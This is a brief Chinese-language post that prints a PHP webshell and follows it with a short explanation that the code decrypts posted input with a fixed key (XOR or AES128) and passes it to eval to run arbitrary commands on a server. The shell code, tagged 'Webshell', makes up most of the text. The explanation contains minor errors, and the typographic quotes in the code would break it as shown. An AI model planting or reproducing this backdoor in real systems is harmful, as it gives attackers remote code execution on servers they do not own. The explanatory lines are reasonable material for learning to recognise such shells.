
<?php @error_reporting(0);$i='f'.'f'.'2'.'9'.'2'.'6'.'b'.'a'.'0'.'c'.'a'.'5'.'4'.'e'.'c'.'a';$_SESSION['k']=$i;session_write_close();$j=file_get_contents(“php://input”);if(!extension_loaded('openssl')){$k=”base64_”.”decode”;$j=$k($j.””);for($l=0;$l<strlen($j);$l++){$j[$l]=$j[$l]^$i[$l+1&15];}}else{$j=openssl_decrypt($j,”AES128″,$i);}$m=explode('|',$j);$n=$m[0];$o=$m[1];class C{public function __invoke($p){eval($p.””);}}@call_user_func(new C(),$o);
代码被混淆并以base64编码
看起来像后门。它接受来自php://input并用AES128对其进行解密。
然后,它使用分隔符“|”拆分解密的字符串。
第一部分存储在$n中,第二部分存储在$0中。
然后使用eval()执行第二部分。
代码试图通过使用类隐藏自己,然后使用call_user_func()调用该类。
该代码是一个后门,用于在服务器上执行任意代码。
本人大部分资源都是搬运的,勿充钱购买,不解答问题
Webshell
是的
小马